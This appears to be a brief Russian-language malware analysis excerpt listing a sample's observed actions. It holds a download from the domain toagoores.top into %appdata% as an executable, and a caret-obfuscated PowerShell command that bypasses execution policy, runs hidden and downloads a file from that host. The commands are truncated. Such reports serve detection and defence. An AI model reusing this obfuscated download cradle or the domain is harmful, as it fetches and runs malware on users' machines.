Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^owe^r^ShEL^L^.Ex^e^ -^EX^Ec^utI^oNPoli^C^y By^pa^Ss -nO^p^rOFi^LE^ ^-^wI^n^dOws^TY^L^e HIdde^N ^(new-oBJEC^t SY^ST^eM.^nE^T.web^cLIE^NT^).^d^OwNLoaDFIle('http://toagoore...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "P^owe^r^ShEL^L^.Ex^e^ -^EX^Ec^utI^oNPoli^C^y By^pa^Ss -nO^p^rOFi^LE^ ^-^wI^n^dOws^TY^L^e HIdde^N ^(new-oBJEC^t SY^ST^eM.^nE^T.web^cLIE^NT^).^d^OwNLoaDFIle('http://toagoore...' (со скрытым окном)